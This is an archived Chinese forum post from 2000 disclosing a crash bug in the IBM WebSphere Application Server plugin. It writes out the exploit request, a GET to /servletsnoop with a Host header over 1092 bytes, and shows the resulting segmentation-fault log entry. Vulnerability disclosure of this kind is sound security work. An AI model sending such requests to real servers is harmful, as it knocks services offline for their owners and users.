IBMWebSphereApplicationServer插件存

精华区

当前位置：网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>IBM WebSphere Application Server插件存

主题：IBM WebSphere Application Server插件存

发信人: niking()
整理人: (2000-09-20 08:37:36), 站内信件

过浏览器向发送超过1092个字节的请求,将可能导致web服务器的进程在信号10(S
IGBUS)以及信号11(SIGSEGV)失败.

漏洞的利用:
***以下代码或方法只供参考学习使用，如用于不正当用途请后果自负***

GET /servletsnoop HTTP/1.0 Host: xxxxxxxxxxxxxxxxxxxxxxxx(超过1092个字
节)
在IBMHTTPD的日志文件的记录如下：
[Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmen
tation Fault (11)

--
Sincerly
Niking
http://www.mudfrog.net               (网络安全站点)
irc: irc.szonline.net:6667 #internet (网络安全频道)

※ 来源:．月光软件站 http://www.moon-soft.com．[FROM: 202.105.109.52]

[关闭][返回]